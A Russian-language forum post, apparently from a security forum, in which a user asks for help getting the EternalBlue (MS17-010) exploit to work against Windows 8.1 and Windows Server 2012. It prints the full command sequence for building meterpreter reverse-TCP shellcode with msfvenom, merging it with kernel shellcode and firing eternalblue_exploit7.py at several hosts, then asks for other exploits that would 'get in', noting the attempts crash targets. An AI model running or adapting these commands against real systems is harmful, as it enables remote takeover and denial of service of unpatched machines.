• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Проблема EternalBlue - эксплотирование Windows 8.1, Windows Server 2012 (не R2)

17.05.2018
7
1
#1
Доброго времени суток, EternalBlue заезжнная тема, но в инете не так много информации об этой уязвимости и Windows 8.1, Windows Server 2012 (не R2).
Речь пойдет именно о данном эксплойте worawit/MS17-010 , он содержит подробную инструкцию об использовании, но если все делать по ней то:
Windows 7 - BSOD (eternalblue_exploit7.py - под 7 винду), shell заходил (об этом чуть позже).
Для Windows 8.1, Windows Server 2012, Windows 10 < 1607 - используется eternalblue_exploit8.py
Для данного эксплойта нужен shell для сборки которого все есть в корневой папки экспойта.
Вот инструкция для создания shell под x64 и x86, которые в итоге можно объединить:
Код:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4444
...
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.13.37 LPORT=4445
...
$ cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
$ cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
$ python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
$ python eternalblue_exploit7.py 192.168.13.81 sc_all.bin
...
$ python eternalblue_exploit7.py 192.168.13.82 sc_all.bin
...
$ python eternalblue_exploit7.py 192.168.13.83 sc_all.bin
...
$ python eternalblue_exploit7.py 192.168.13.84 sc_all.bin
Проблемы:
1) При использовании этого shell и eternalblue_exploit8.py (Для Windows 8.1, Windows Server 2012, Windows 10 < 1607) скрипт за запускается так как стоит ограничение по длине Shellcode too long. The place that this exploit put a shellcode is limited to 3712 bytes. в то время как наш shell весит 41 Kbytes.
2) При использовании другого shell и данного экспойта получается DOS, на атакуемой машине BSOD.
Заранее спасибо за Ваше внимание, если знаете какие-нибудь скрипты/экспойты который зайдут на данных машинах, будь добрый подсказать, интересует любые кроме повышения привилегий.
 
Последнее редактирование:
Вверх Снизу